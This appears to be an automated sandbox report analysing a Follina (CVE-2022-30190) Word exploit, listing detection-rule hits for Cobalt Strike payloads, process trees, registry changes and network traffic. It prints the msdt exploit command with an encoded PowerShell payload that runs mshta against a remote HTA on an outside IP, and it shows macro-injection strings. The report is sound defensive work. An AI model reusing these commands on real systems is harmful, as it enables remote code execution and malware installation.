Source: 00000019.00000003.499586408.0000000006E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509707518.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508774998.0000000005C75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.504055585.00000000065C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508725411.0000000005CBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500355385.0000000006DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499979043.0000000006E3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000002.568622396.0000000006E13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500225710.0000000006E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.506934087.00000000060F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.506382622.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500146207.0000000006E1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.503951630.0000000006608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500435591.0000000006DDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500214700.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509015844.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.499330598.0000000006CBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.505281515.0000000006456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508508228.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507143214.0000000006072000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.509189150.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.507585756.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.501274310.0000000006AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508358895.0000000005D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.508666437.0000000005CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.500854607.0000000006B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000019.00000003.498808453.0000000006D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: Process Memory Space: msdt.exe PID: 7052, type: MEMORYSTR	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
Source: Process Memory Space: mshta.exe PID: 5852, type: MEMORYSTR	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dllhost[1].hta, type: DROPPED	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE

Source: DiagPackage.dll.mui.9.dr	Static PE information: No import functions for PE file found
Source: DiagPackage.dll.9.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: DiagPackage.dll.9.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.9.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.9.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE

Section loaded: sfc.dll

Jump to behavior

Source: V3g2Pfu707.docx	Virustotal: Detection: 33%
Source: V3g2Pfu707.docx	ReversingLabs: Detection: 29%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"
Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\system32\mshta.exe" http://159.75.135.162:61256/dllhost.hta
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\\SysWOW64\\rundll32.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\\SysWOW64\\rundll32.exe	Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32

Jump to behavior

Source: V3g2Pfu707.docx.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\V3g2Pfu707.docx

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{62B37E75-AE27-4D86-A250-544904017A8C} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal92.troj.expl.evad.winDOCX@18/34@0/3

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\\SysWOW64\\rundll32.exe

Source: mshta.exe	Binary or memory string: _Application.Visible("false");_Application.Version();IWshShell3.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM");IWshShell3.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM");IWshShell3.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\AccessVB", "1", "REG_DWORD");_Application.Workbooks();Workbooks.Add();_Workbook.VBProject();_VBProject.VBComponents();_VBComponents.Add("1");_VBComponent.CodeModule();_CodeModule.AddFromString("Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As LongEnd TypePrivate Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String ");_Application.DisplayAlerts("false");_Application.Run("Auto_Open");
Source: mshta.exe, 00000019.00000003.498723453.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.511885316.000000000586C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0_Workbook.VBProject();
Source: mshta.exe, 00000019.00000002.567767973.0000000005947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: _Workbook.VBProject();
Source: mshta.exe, 00000019.00000003.490927770.0000000005869000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491409974.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491157715.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491019330.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.498723453.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559559685.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491309845.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.511885316.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491270423.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559502075.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491220893.000000000586C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next

Source: C:\Windows\SysWOW64\msdt.exe

File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: http://101.33.231.81:62563/exploit.html!

Source: C:\Windows\SysWOW64\msdt.exe	File created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe	File created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.mui	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\msdt.exe	File created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe	File created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.mui			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 62563
Source: unknown	Network traffic detected: HTTP traffic on port 62563 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 61256
Source: unknown	Network traffic detected: HTTP traffic on port 61256 -> 49781

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE

Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
